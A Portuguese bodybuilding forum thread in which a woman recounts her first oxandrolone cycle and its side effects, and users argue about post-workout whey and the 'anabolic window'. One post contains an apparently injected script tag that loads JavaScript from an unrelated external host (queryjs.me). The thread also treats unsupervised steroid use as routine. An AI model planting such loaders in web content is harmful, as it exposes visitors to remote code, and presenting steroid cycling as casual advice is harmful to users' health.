Ir para conteúdo
  • Cadastre-se

1° Ciclo Oxandrolona (Feminino)


Posts Recomendados

Não tem problema demorar 5 minutos pra tomar o whey, pode ser tb. Eu tomo na academia pq demoro 15 minutos pra chegar em casa. Achei um absurdo a pessoa falar q demora 1 hora pra se alimentar depois do treino, assim nunca vai ter resultados. Se vc mora pertinho da academia pode optar por fazer uma refeição em vez do whey, mas o whey ajuda mto pq até chegar em casa e preparar algo demora. A não ser que vc deixe tudo pronto, aí vai de vc escolher comer ou tomar whey. Se vc tomar whey vai precisar fazer uma refeição 1 hora depois.

cê viu a foto que eu postei ali em cima? na minha opinião, tô tendo resultados ótimos, whey tomo raramente, não tomo nenhum outro suplemento também, e as vezes demoro mais que uma hora pra comer depois do treino.

como o Pablo falou, tem embasamento científico, tem pesquisas e estudos sobre isso. dá uma procura em "janela anabólica pós treino", se informar nunca é demais, principalmente ao repassar informação aos outros.

Editado por suzaah
Link para o comentário
Compartilhar em outros sites

Publicidade

não funciona assim de catabolizar porque não tomou whey imediatamente ..

aliás, na academia o que você faz é justamente catabolizar, então relaxa.

eu raramente tomo whey no pós treino, e normalmente como só 1h depois.

http://postimg.org/image/n8z3i8mof/full/

as duas ultimas fotos tem 4 meses de diferença e eu ainda não tomava N-A-D-A de suplementos.

por isso eu bato na tecla de que uma boa dieta é melhor que 9084628936129 pózinhos milagrosos.

ajuste a dieta primeiro, tente consumir toda a proteína que você precisa de comida, que além de todos os micronutrientes que tem, ainda é mais barato.

eu cortaria pelo menos metade dessas frutas e colocaria proteína em todas as suas refeições, isso só pra começar.

suplemento é pra suprir o que você não consegue alcançar com a dieta (eu to comendo 2300kcal e não aguento mais ver comida na minha frente, aí no meu caso, tomo whey quando eu não consigo comer, APENAS porque desce mais fácil).

é um complemento, não faz mágica se a dieta estiver ruim!

Parabéns menina ta linda !!

Link para o comentário
Compartilhar em outros sites

Acompanhando !! Não deixe de postar os pós e contras da semana

bjosss bons ganhoss !

Oiii!!

Pode deixar q não vou deixar contar tudooo...

Bjos

Ola pessoal! !!

Uma coisa q me preocupa bastante era a questão da menstruação,que em vários relatos velo q não vem durante o ciclo.Mas pr mim veio quase normal(ufa)veio bem menios q o normal,só não tive colicas nem inchaço(não sei se é por coisa da oxan?).

De resto tah tudo tranquilo,fora as espinhas que continuam.

Não tive um ganho muito considerável mas ganhei bastante massa magra,e já perdi duas bermudas().Mas nada muito aparente.Mas estou gostando dos resultados.

Tenho só mais alguns dias de ciclo.Quando terminar posto as fotos do depois e medidas...

Bjosss

Link para o comentário
Compartilhar em outros sites

Engraçado esse povo falando sobre refeição pós treino 50 horas depois de já ter treinado. Nunca vi ninguém com bons resultados fazendo isso. Cada um que siga oq acha melhor pra si. Eu prefiro manter minhas refeições nos horários corretos, principalmente a do pós treino.

http://www.hipertrofia.org/forum/topic/164501-%e1%95%99%e2%87%80%e2%80%b8%e2%86%bc%e2%80%b6%e1%95%97-leangains-iifym/page-62#entry2403373

9WR8py0.jpg

0m2Asqi.jpg

Editado por Pablo79
Link para o comentário
Compartilhar em outros sites

  • 2 semanas depois...

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Bom, acredito que a alimentação é o mais importante, mas pra garantir eu tomo só whey no pós treino que é imediatamente quando termino o treino. Pois até chegar em casa já catabolizei. Tirando isso acho q não precisa de tanto suplemento nao ;)

Nao Catabolizou nao rsrsrs esse negocio de janela anabolica é meio balela, tem que comer e pronto.

Link para o comentário
Compartilhar em outros sites

Olá galera!!

Desculpem por nao ter postado mais nada é q tah foda a correria no trabalho.Ainda nao consegui tirar as fotos do depois.Mas em medidas nao ganhei quase nada,mas ganhei 2kg e perdi 1 de cintura,então ganhei massa magra,esperava ganhar um pouco mais...mas acho q cometi alguns erros,tipo deveria ter comido mais carboidratos(mas sempre tenho muito medo de ganhar pança..kkk)treinei bem pesado então acho q o erro nao foi este.

Os pequenos colaterais q tive q são espinhas no rosto,inchaço lah(pequenos lábios),e libido nas alturas sumiram na primeira semana,só as malditas pipoquinhas nas costas q insistem em ficar(O q posso fazera respeito disso?)

Ganhei bastante força(q nao perdi depois do final do ciclo)

Mas gostei dos resultado pois já sabia q a oxan é uma droga fraca,e achei q nao ia mais querer ciclar,mas acho q vou sim,claro q vou esperar no minimo 1 ano,pr ciclar com algo um pouquinho mais forte

Amanhã faço as fotos e posto com as medidas qnao mudaram muito

Ps-Estou com queda de cabelo q coincidiu com o fim do ciclo,será q e por cousa da oxan?e o q posso fazer pr parar

Bjao a todos e bom findi

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...